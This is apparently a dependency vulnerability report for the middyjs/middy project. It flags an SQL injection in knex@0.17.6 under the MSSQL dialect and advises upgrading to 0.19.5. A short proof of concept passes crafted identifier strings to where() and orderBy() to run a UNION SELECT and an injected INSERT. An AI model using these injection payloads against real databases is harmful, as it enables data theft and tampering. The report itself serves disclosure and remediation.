middyjs/middy

🛵 The stylish Node.js middleware engine for AWS Lambda.
Vulnerabilities 1 via 1 paths
Dependencies 162
Source GitHub
Commit 846d48b0

Find, fix and prevent vulnerabilities in your code.

Severity
  • 1
Status
  • 1
  • 0
  • 0
high severity

SQL Injection

  • Vulnerable module: knex
  • Introduced through: knex@0.17.6

Detailed paths

  • Introduced through: middy@middyjs/middy#846d48b0276267a525366125969f224deb89f9cc knex@0.17.6
    Remediation: Upgrade to knex@0.19.5.

Overview

knex is a query builder for PostgreSQL, MySQL and SQLite3

Affected versions of this package are vulnerable to SQL Injection. Identifiers are escaped incorrectly as part of the MSSQL dialect, allowing attackers to craft a malicious query to the host DB.

Note: Knex is not vulnerable when using other dialects than MSSQL

PoC

const knex = require('knex')({
  client: 'mssql',
  connection:{
    port: 1433,
    host: '127.0.0.1',
    password: 'yourStrong(!)Password',
    user: 'sa',
  },
});

(async () => {
  await knex.schema.createTableIfNotExists('projects', (table) => {
    table.increments();
    table.string('name');
  });
  console.log(await knex('projects').where('id] = 1 UNION SELECT 1, @@version -- --', 1));
  console.log(await knex('projects').where('id', 1)
    .orderBy('id]; INSERT INTO projects (name) VALUES (\'abc\'); -- --'));
})();

Remediation

Upgrade knex to version 0.19.5 or higher.

References